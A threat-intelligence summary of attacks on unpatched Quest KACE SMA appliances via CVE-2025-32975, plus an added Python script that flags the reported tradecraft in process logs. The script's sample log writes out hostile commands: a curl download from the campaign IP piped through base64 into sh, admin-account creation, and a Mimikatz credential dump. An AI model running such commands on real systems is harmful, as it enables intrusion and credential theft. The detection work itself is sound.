Threat actors have been observed exploiting CVE-2025-32975 in unpatched Quest KACE Systems Management Appliance (SMA) instances, enabling authentication bypass and administrative takeover. Arctic Wolf detected activity beginning the week of March 9, 2026, including downloading Base64-encoded payloads from 216.126.225[.]156, account creation via runkbot.exe, credential theft with Mimikatz, and RDP access to backup systems; administrators should apply the patches and avoid exposing SMA to the internet. #CVE-2025-32975 #QuestKACE #SMA #ArcticWolf #Mimikatz #Veeam #Veritas #runkbot.exe
Key points
- A CVSS 10.0 authentication bypass (CVE-2025-32975) in Quest KACE SMA is being exploited to impersonate users and seize administrative accounts.
- Arctic Wolf observed malicious activity starting the week of March 9, 2026, targeting internet-exposed, unpatched SMA systems.
- Attackers used curl to download Base64-encoded payloads from 216.126.225[.]156 and leveraged runkbot.exe to create additional administrative accounts.
- Adversaries conducted credential harvesting with Mimikatz, performed reconnaissance commands, and obtained RDP access to backup infrastructure and domain controllers.
- Administrators are advised to apply patches (13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, 14.1.101 Patch 4) and avoid exposing SMA instances to the internet.
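The behaviours listed above (contact with the reported IP, a download followed by a Base64 decode, account creation spawned by runkbot.exe, Mimikatz execution, and an RDP client launch) can be turned into a small triage pass over process-creation logs. The script below is an added example, not Arctic Wolf's or Quest's code: the pipe-delimited log format, host names, account names and command lines are constructed for illustration, and only the IP address (defanged as 216.126.225[.]156 in the write-up) and the runkbot.exe and Mimikatz references come from the report itself.

```python
"""Triage constructed process-creation events for the tradecraft described in
the Arctic Wolf write-up. Added example, not vendor code: log format, hosts,
users and command lines are constructed; the IP and tool names are from the report."""
import re
from collections import Counter
from datetime import datetime, timedelta

CAMPAIGN_IP = "216.126.225.156"  # from the write-up (defanged there), refanged for matching
CORRELATION_WINDOW = timedelta(seconds=60)  # assumption: decode follows download quickly

# Constructed sample log: timestamp|host|parent_image|user|command_line
SAMPLE_LOG = """\
2026-03-10T02:14:07Z|sma-01|php-cgi|www-data|curl -s http://216.126.225.156/a.b64 -o /tmp/a.b64
2026-03-10T02:14:09Z|sma-01|sh|www-data|base64 -d /tmp/a.b64 | sh
2026-03-10T03:41:52Z|WKS-07|runkbot.exe|SYSTEM|net user svc_kace Winter2026! /add
2026-03-10T03:41:53Z|WKS-07|runkbot.exe|SYSTEM|net localgroup administrators svc_kace /add
2026-03-10T04:05:11Z|WKS-07|cmd.exe|svc_kace|mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
2026-03-10T04:20:30Z|WKS-07|cmd.exe|svc_kace|mstsc.exe /v:BKP-01
2026-03-10T08:00:02Z|WKS-12|explorer.exe|jdoe|notepad.exe C:\\Users\\jdoe\\notes.txt
"""

# Command-line patterns (case-insensitive); tuned to the constructed log, not exhaustive
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b", re.I)
DECODER_RE = re.compile(r"\bbase64\b\s+(-d|--decode)\b|\bcertutil(\.exe)?\b.*-decode", re.I)
NET_ADD_RE = re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.I)
CREDDUMP_RE = re.compile(r"mimikatz|sekurlsa::", re.I)
RDP_RE = re.compile(r"\bmstsc(\.exe)?\b", re.I)


def parse(log: str) -> list[dict]:
    """Parse the pipe-delimited sample format; the command line is the last field
    and may itself contain '|', hence maxsplit=4."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, parent, user, cmd = line.split("|", 4)
        events.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "host": host, "parent": parent.lower(), "user": user, "cmd": cmd,
        })
    return events


def triage(events: list[dict]) -> list[dict]:
    """Return one finding per (rule, event) that matches."""
    findings = []

    def flag(rule: str, e: dict) -> None:
        findings.append({"rule": rule, "host": e["host"],
                         "ts": e["ts"].isoformat(), "cmd": e["cmd"]})

    # Single-event rules
    for e in events:
        cmd = e["cmd"]
        if CAMPAIGN_IP in cmd:
            flag("campaign_ip_contact", e)
        if e["parent"] == "runkbot.exe" and NET_ADD_RE.search(cmd):
            flag("runkbot_account_creation", e)
        if CREDDUMP_RE.search(cmd):
            flag("credential_dumping_tool", e)
        if RDP_RE.search(cmd):
            flag("rdp_client_launch", e)  # low-confidence on its own; context for the above

    # Correlation rule: a download followed by a decode on the same host within the window
    for d in (e for e in events if DOWNLOADER_RE.search(e["cmd"])):
        for e in events:
            delta = e["ts"] - d["ts"]
            if (e["host"] == d["host"] and DECODER_RE.search(e["cmd"])
                    and timedelta(0) <= delta <= CORRELATION_WINDOW):
                flag("download_then_decode", e)
                break
    return findings


def summarize(findings: list[dict]) -> dict:
    """Count findings per rule, handy for a quick severity read."""
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    results = triage(parse(SAMPLE_LOG))
    for f in results:
        print(f"{f['ts']} {f['host']:<7} {f['rule']:<26} {f['cmd']}")
    print(summarize(results))
```

The single-event rules are deliberately narrow (account creation is only flagged when the parent image is runkbot.exe, matching the report), while the download-then-decode correlation keys on host and time rather than on any specific payload name, so it survives the attacker renaming files. The benign WKS-12 line produces no finding.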
Read More: https://thehackernews.com/2026/03/hackers-exploit-cve-2025-32975-cvss-100.html